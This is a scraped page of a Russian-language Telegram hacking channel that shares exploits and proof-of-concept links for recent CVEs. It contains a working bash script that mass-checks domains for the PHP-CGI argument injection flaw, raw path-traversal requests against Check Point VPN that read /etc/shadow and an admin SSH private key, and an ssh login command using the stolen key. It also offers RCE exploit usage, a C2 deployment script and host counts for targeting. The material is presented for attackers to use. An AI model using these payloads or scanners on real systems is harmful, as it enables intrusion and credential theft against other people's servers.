Proxy Bar


Kanal geosi va tili: Rossiya, Ruscha


Exploits, Hacking and Leaks
Чат группы - https://t.me/chat_proxy_bar
Связь с администрацией и реклама:
admin@proxy-bar.org
Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker

Связанные каналы

Kanal geosi va tili
Rossiya, Ruscha
Statistika
Postlar filtri


DDOS для самых маленьких

#pic


CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 "
exit 1
fi

# Call the main function with the domain list file
main "$1"

*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_script.sh /path/to/domains-list

#php #xamp


CVE-2024-4577 Argument Injection in PHP-CGI
*
При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
*
fofa link (610,604 хостов)

#php #xamp


CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"

*
POC exploit

#apache #rce


CVE-2024-27822 macOS PackageKit
*
LPE
*
Для версий:
macOS 14.5 Beta 1 (23F5049f) and older
macOS 13.6.6 (22G630) and older
macOS 12.7.4 (21H1123) and older
Any version of macOS 11 or older
*
writeUp
*
exploit

#macos #lpe


CVE-2024-36801 SemСms
*
sql injection для версии Semcms v 4.8
*
SQLi + POC


Вышел PagedOut
Июнь 2024
*
почитать PDF

#ezine #hacking #tricks #coding


Unlock Docker (Россия, Куба, Иран, Судан, Сирия, КимЧенЫновка)
*
BASH script
*
#dogger


CVE-2024-5326 WordPress
*
Post Grid Gutenberg и плагин PostX = 4.1.2
User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор.
*
POC exploit

#wordpress #exploit


CVE-2024-21512 MySQL2
*
Дырка в библиотеке MySQL для Node.js
*
POC

#mysql


Доброй ночи.
Написал небольшую книжку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org

#book #linux #hex


fuck yeah !
*
ansible-havoc
*
Bash cкрипты/ansible для развертывания Havoc на Linode и настройки и SSL
*
download

#C2 #ansible


CVE-2024-24919 Check Point Remote Access VPN 0-Day
Ну или так 👌
aCSHELL/../../../../../../../
home/admin/.ssh/id_rsa
*
ssh admin@Хостъ -i id_rsa

#shitPointVPN #0Day


CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host:
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#0day #checkpoint


RWX_MEMEORY_HUNT_AND_INJECTION_DV
*
OneDrive.exe + API-интерфейс = шелл-код (без выделения новой области памяти RWX)
*
link


CVE-2024-27842 + CVE-2023-40404 macOS
*
Сплоит позволяет выполнять код на уровне ядра
*
POC exploit (для CVE-2024-27842)
POC exploit (для CVE-2023-40404)

#macos


cve-2024-2961_cnext-exploits.zip
7.6Kb
CVE-2024-2961 - тихоходка 2
*
Переполнение буфера в glibc's iconv
*
Exploit + POC 👌

#yammy


CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в glibc.
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает Iconv со своим RCE.
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine


Linux Kernel Teaching. Laboratory
*
Большой и годный сборник лекций и лабораторных работ по ядру Linux. Лекции посвящены теоретическому исследованию ядра Linux.
Лабораторки сделаны в стиле инструкций.
Будет полезно: админам, драйверописателям и руткитоварам
*
Link

#linux #kernel


Образовательные мультики по воскресеньям !
*
Едим сырник, пьем кофе, смотрим мультики
*
Как работает нашумевший бэкдор XZUtils SSHD.
#XZ #мультики

20 ta oxirgi post ko‘rsatilgan.